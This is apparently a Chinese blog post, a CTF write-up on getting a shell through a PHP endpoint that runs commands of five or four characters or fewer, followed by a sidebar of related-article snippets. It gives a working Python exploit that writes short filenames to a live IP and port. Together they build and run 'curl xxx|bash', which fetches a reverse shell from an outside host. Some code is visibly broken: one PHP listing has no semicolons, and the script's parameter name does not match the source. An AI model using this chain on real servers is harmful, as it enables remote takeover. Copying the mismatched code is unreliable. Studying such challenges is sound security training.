四字符五字符getshell

最新推荐文章于 2023-02-14 15:45:16 发布
最新推荐文章于 2023-02-14 15:45:16 发布
阅读量751 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flying_bird2019/article/details/113530150
版权

参考

五字符

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

每次输入5字符以内的命令并执行
linux中命令可以拆分成多行
并将这些拆分的命令构成文件名
用ls命令将这些文件名(命令执行结果)写入文件,执行文件即可执行命令

四字符

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR'])
 
    @mkdir($sandbox)
    @chdir($sandbox)
    if (isset($_GET['cmd']) & & strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd'])
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox)
    }
    highlight_file(__FILE__)

四字符可以利用dir代替ls命令,*的作用是将上一个命令执行的结果进行匹配并执行
rev命令是反向输出文件每一行
反弹shell

这里借鉴一个学弟的题解

<=4

  1. dir命令作为ls命令的别名
  2. *命令会先将当前目录下所有的文件进行一个排序,然后排序后的结果会以命令的形式送去bash执行,如下图,但是如果有写不是命令的话就会出现command not found的报错,这样一来我们就可一利用dir加上*命令去执行写入文件的操作
  3. 利用rev命令去反向文件的字符串,如果不多加h的话在你行dir的时候按字母排序字母t比s更靠后,放进v文件之后以及放入想文件里面是这样的,这就跟我们的目的相违背,不能构造出ls -t >g
  4. 反弹shell
import requests
from time import sleep
from urllib.parse import quote

payload = [
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    '>rev',
    '*v>x',


    '>ash', 
    '>b\\', 
    '>\|\\',
    '>p\\',
    '>to\\', 
    '>u.\\',
    '>y\\', 
    '>eo\\', 
    '>th\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://219.219.61.234:50051/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://219.219.61.234:50051/?rce=' + quote(i) )
    print (i)
    sleep(0.1)

V文件内容

g>  ht-  sl

X文件内容

ls  -th  >g

g文件内容

g
cu\
rl\
 \
th\
eo\
y\
u.\
to\
p\
|\
b\
ash
x
rev
v
ht-
g>
sl
dir

执行g的时候会找不到命令,不影响执行
执行:

curl xxx|bash

xxx为一个域名,网站可以放一个反弹shell命令
这样就可以得到shell

flying_bird2019
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5位可控字符下的命令执行
qq_45521281的博客
05-03 1576
遇到了这样一个题,这题是一个特别的命令执行题, 首先进去首页之后发现以下源码: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &...
hitcon_2017_ssrfme
o3Ev的博客
05-02 363
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
【ctf】命令执行漏洞(三)
wlllllianqing的博客
10-15 603
命令执行漏洞() 15位、7位、5位、4位可控字符下的任意命令执行 15位可控字符 利用原理: 直接下载一个空文件,然后直接将shell分段写入文件中,最后修改文件名来getshell wget是Linux中的一个下载文件的工具 echo可以直接将字符输出到文件中,但需要使用‘>’符号 且第一次输出到文件中时使用‘>’符号,再输入进文件就需要使用‘>>’来进行追加 例如:将一句话写入文件 <?php eval($_GET[1]); 注意:当遇到符号时,记得使用
node搭建自定义cli
jsqiang
11-28 885
自定义cli 搭建 本文介绍简单的nodecli的搭建,可以通过简单的cli我们去延伸多功能,深度的自定义cli的搭建,搭建的同时我们还可以去掌握node一些常见的插件和api,这篇文章主要介绍 自动化路由的搭建(简单的路由)。 搭建cli 1.下载需要用到的npm包 npm i chalk clear commander download-git-reop figlet handlebars open ora watch util -D 插件的解释: chalk 用于控制台的颜色 clear 清空控制
创建基于vue2的vue-cli及运行,vue.js官网样例如何在vscode上运行(如何应对报错情况的三种解决方式)
m0_56905968的博客
11-12 2022
如何创建vue-cli脚手架并创建vue2版本,创建成功后运行vue-cli的方法,vue.js官网如何在vscode上运行
如何通过非数字与字符的方式实现PHP WebShell详解
12-12
preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']); } 但如果你想要绕过WAF的话,你还得使用一些其他的技术来重写你的webshell。 思路 首先我们要明确思路,我的核心思想就是通过一系列...
正则表达式(regex)入门、元字符(特殊字符)学习与提高
01-21
正则表达式使用单个字符串来描述、匹配一系列符合某个句法规则的字符串。几乎在各种计算机编程语言中都有用到。可以分为普通正则表达式、扩展正则表达式、高级正则表达式。普通正则表达式在linux shell中常用到,...
shell:Shell-ish 字符串拆分器。 它支持带空格的带引号的字符
06-16
外壳的转义/取消转义字符串安装$ go get github.com/shibukawa/shell参考分裂func Parse(src string) []string 按空格拆分 src 字符串。 如果块被引用,双引号之间的空格将被忽略。 import "github....
shell 编程指南pdf
09-24
部分 基础shell编程 第16章 shell脚本介绍 151 16.1 使用shell脚本的原因 151 16.2 脚本内容 151 16.3 运行一段脚本 152 16.4 小结 153 第17章 条件测试 154 17.1 测试文件状态 154 17.2 测试时使用逻辑操作符 ...
get_word.sh
05-13
使用shell脚本来实现,读取一段字母,输出连续的任意长度的字母字符组合可能。
从0到1手把手开发脚手架
coder__wang的博客
07-18 247
前面对脚手架和其原理有个初步的认识,本篇将和大家一起实操,从零开始搭建一个简易的脚手架(需要有node环境)~ 首先,新建一个文件夹wang-cli-test,在该文件夹下打开终端,初始化项目:npm init -y。 用vs code打开该项目,新建子文件夹bin,bin目录下新建index.js,如图: 接下来配置package.json文件: { "name": "wang-cli-test", "version": "1.0.0", "description": "", .
4位可控字符下的任意命令执行
大方子
11-02 2806
*因为环境有点问题无法复现,无法整体复现 *但是这个trick非常有意思,想分享下 题目源码: <?php error_reporting(E_ALL); $sandbox = '/var/www/html/sandbox/'.md5("orange".$_SERVER['REMOTE_ADDR']); mkdir($sandbox); ...
命令行的使用cli
alin的博客
01-28 787
命令行的使用cli 为程序添加命令行启用的方法 新建源程序在其中添加一个结构体 // 处理用户输入命令,完成具体函数的调用 // cli : command line 命令行 type CLI struct { // 不需要字段 } // 使用说明,帮助用户正确使用 const Usage = ` Usage: ./blockchain create "创建区块链" ./blockchain addBlock <需要写入的数据> "添加区块" ./blockchain print
命令执行中对字符长度限制的绕过解析
weixin_59419135的博客
02-14 1045
命令执行中对字符长度限制的绕过解析,对限制长度为7,5,4的字符过滤进行绕过
5位可控字符下的任意命令执行 - 另一种解题方法
Ms08067安全实验室
11-25 1225
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀01前言题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v...
php如何打网页ctf,【CTF 攻略】如何绕过字符限制getshell
weixin_28729331的博客
03-17 638
预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言本文主要整理如何巧用Linux命令绕过命令注入点的字符数量限制,内容围绕HITCON CTF 2017 的两道题展开,先讲字符的限制,再讲字符的。在此感谢下主办方分享这么有趣的点子。热身问题的起源是 HITCON CTF 2017 的 BabyFirst Revenge 题,题目的主要代码如下:B...
vue-cli的执行流程
前端攻城狮的博客
03-27 637
1.入口文件是main.js 模块的导出:export default {} 模块的导入:import Vue from 'vue' 2..vue文件是vue-cli把组件封装的单独文件 <template></template>// 存放html, 一定要有一个根元素 <script></script>//存放js, 一定要 export defa...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
sql注入getshell
最新发布
09-09
通过getshell技术,攻击者可以在没有合法帐户的情况下,对目标系统进行远程控制。因此,避免SQL注入攻击和保护系统安全是非常重要的。 ### 回答2: SQL注入是一种常见的Web安全漏洞,攻击者通过在用户输入的数据中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值